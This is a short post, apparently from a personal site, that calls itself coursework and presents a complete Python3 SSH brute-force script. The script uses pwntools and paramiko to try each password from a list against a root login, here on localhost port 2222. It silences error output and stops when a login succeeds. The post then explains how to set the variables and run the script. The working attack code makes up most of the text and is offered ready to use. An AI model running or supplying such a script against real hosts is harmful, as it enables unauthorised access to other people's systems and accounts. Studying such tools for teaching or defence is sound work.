Just some coursework, an example SSH bruteforce cracker in Python3.

cat ssh-brute.py            
#!/usr/bin/python3
# SSH Bruteforce login script
# Version 0.1 - 12-11-2022
# NX - <This email address is being protected from spambots. You need JavaScript enabled to view it.>

from pwn import *
import paramiko
import sys

#suppress errors, redirect to dev null

class DevNull:
    def write(self, msg):
        pass
sys.stderr = DevNull()

host = "127.0.0.1"
hostport = 2222
username = "root"
attempts = 0

#open password list file
with open("ssh-common-passwords.txt", "r") as password_list:
    for password in password_list:
        password = password.strip("\n")
        try:
            print("[{}] Attempting password: '{}'!".format(attempts, password))
            response = ssh(host=host, port=hostport, user=username, password=password, timeout=1)
            if response.connected():
                print("[>] Valid password found: '{}'!".format(password))
                response.close()
                break
            response.close()
        except paramiko.ssh_exception.AuthenticationException:
            print("[X] Invalid Password!")
        attempts += 1

Pretty simple, and simple to use. Just set the variables, make  password list in txt format, and launch the script. It is noisy, and slow since it doesn't use threading, but to show a simple concept, it's good enough.

You'll need the pwntools Python library and paramiko library to use this script.

Have fun :)

You have no rights to post comments